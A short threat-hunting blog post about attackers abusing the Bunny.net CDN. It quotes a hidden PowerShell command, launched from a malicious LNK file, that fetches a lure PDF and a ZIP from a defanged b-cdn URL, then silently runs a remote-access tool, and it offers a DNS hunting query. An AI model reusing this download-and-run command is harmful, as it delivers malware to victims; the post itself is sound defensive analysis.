281. Adversaries Abuse Bunny.net CDN

Hello everyone!

We talked about how adversaries abuse various legitimate services to distribute malware multiple times already. But let's look at another example.

According to this report, the adversary leveraged malicious LNK file to launch a hidden PowerShell command that downloads a lure PDF and another ZIP file from the Bunny CDN URL:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Description.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

Despite the fact the command is quite common and can be easily detected, the use of the Bunny CDN seems interesting. And we can use it for hunting, of course:

event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

See you tomorrow!


Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge